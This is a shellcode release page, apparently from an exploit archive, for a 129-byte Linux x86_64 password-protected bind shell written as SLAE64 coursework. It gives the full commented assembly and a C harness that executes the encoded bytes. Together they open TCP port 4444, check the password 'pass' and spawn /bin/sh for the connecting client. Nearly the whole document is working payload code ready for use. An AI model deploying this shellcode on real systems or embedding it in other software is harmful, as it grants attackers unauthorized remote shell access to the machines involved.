Linux/x86_64 TCP/4444 Bindshell With Password Shellcode

129 bytes small Linux/x86_64 bind (4444/TCP) shell (/bin/sh) + password (pass) shellcode.


MD5 | 4f69a9a7b34a1231bc105cb3374d328e

/*
; Title : Linux/x86_64 - Bind Shell (/bin/sh) with Password (configurable) (129 bytes)
; Date : 2019-08-18
; Author : Gonçalo Ribeiro (@goncalor)
; Website : goncalor.com
; SLAE64-ID : 1635

global _start

%define pass "pass"
%define port 0x5c11 ; htons(4444)

_start:
jmp real_start
password: db pass
pass_len: db $-password

real_start:
socket:
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; __NR_socket = 41
; On success, a file descriptor for the new socket is returned

push 41
pop rax
push 2
pop rdi
push 1
pop rsi
cdq ; copies rax's bit 31 to all bits of edx (zeroes rdx)
syscall

push rax
pop rdi

bind:
; server.sin_family = AF_INET; short
; server.sin_port = htons(4444); unsigned short
; server.sin_addr.s_addr = INADDR_ANY; unsigned long
; bzero(&server.sin_zero, 8);
;
; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html
; struct sockaddr_in {
; short sin_family;
; unsigned short sin_port;
; struct in_addr sin_addr;
; char sin_zero[8];
; };
;
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; INADDR_ANY = 0
; AF_INET = 2
; __NR_bind = 49
; On success, zero is returned

xor eax, eax ; shorter and will still zero the upper bytes
push rax ; sin_zero
push ax
push ax ; sin_addr
push word port
push word 2

; bind
add al, 49
push rsp
pop rsi
add dl, 16 ; sizeof(sockaddr_in)
syscall

listen:
; listen(sock, 2)
; __NR_listen = 50
; On success, zero is returned

mov al, 50
xor esi, esi
mov sil, 2
syscall

accept:
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
; __NR_accept = 43
; On success, a file descriptor is returned

mov al, 43
xor esi, esi
;xor rdx, rdx ; already zeroed
syscall

push rax

;close:
; close(sock)
; __NR_close = 3
; returns zero on success

; closing is not strictly necessary
;mov al, 3
;syscall

dup2:
; dup2(new, 0);
; dup2(new, 1);
; dup2(new, 2);
; __NR_dup2 = 33
; On success, return the new file descriptor

pop rdi ; "new" was pushed in accept()
push 2
pop rsi

dup2_loop:
mov al, 33
syscall
dec esi
jns dup2_loop

read_password:
; read(int fd, void *buf, size_t count)
; On success, the number of bytes read is returned

;xor eax, eax ; already done by dup2
;rdi = "new" ; already done in dup2
push rax
push rax ; create space for "buf" in the stack
push rsp
pop rsi ; rsi = *buf
mov dl, 16
syscall

compare_password:
xor ecx, ecx
lea rdi, [rel pass_len]
mov cl, [rdi]
sub rdi, rcx
cld
repz cmpsb
jne exit

execve:
; execve(const char *path, char *const argv[], char *const envp[])
; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding)
; rsi, argv = (char**) (/bin//sh, 0x00)
; rdx, envp = &0x00

xor eax, eax
push rax
push rsp
pop rdx ; *rdx = &0x00

mov rsi, 0x68732f2f6e69622f ; rax2 -S $(echo /bin//sh | rev)
push rsi
push rsp
pop rdi ; rdi = (char*) /bin//sh

push rax
push rdi
push rsp
pop rsi ; rsi = (char**) (/bin//sh, 0x00)

mov al, 59
syscall

exit:
;xor eax, eax ; upper bytes are zero after read
mov al, 60
syscall
*/


#include <stdio.h>
#include <string.h>

char code[] =
"\xeb\x05\x70\x61\x73\x73\x04\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f"
"\x05\x50\x5f\x31\xc0\x50\x66\x50\x66\x50\x66\x68\x11\x5c\x66\x6a\x02\x04"
"\x31\x54\x5e\x80\xc2\x10\x0f\x05\xb0\x32\x31\xf6\x40\xb6\x02\x0f\x05\xb0"
"\x2b\x31\xf6\x0f\x05\x50\x5f\x6a\x02\x5e\xb0\x21\x0f\x05\xff\xce\x79\xf8"
"\x50\x50\x54\x5e\xb2\x10\x0f\x05\x31\xc9\x48\x8d\x3d\xad\xff\xff\xff\x8a"
"\x0f\x48\x29\xcf\xfc\xf3\xa6\x75\x1a\x31\xc0\x50\x54\x5a\x48\xbe\x2f\x62"
"\x69\x6e\x2f\x2f\x73\x68\x56\x54\x5f\x50\x57\x54\x5e\xb0\x3b\x0f\x05\xb0"
"\x3c\x0f\x05";

int main() {
printf("length: %lu\n", strlen(code));
((int(*)()) code)();
}

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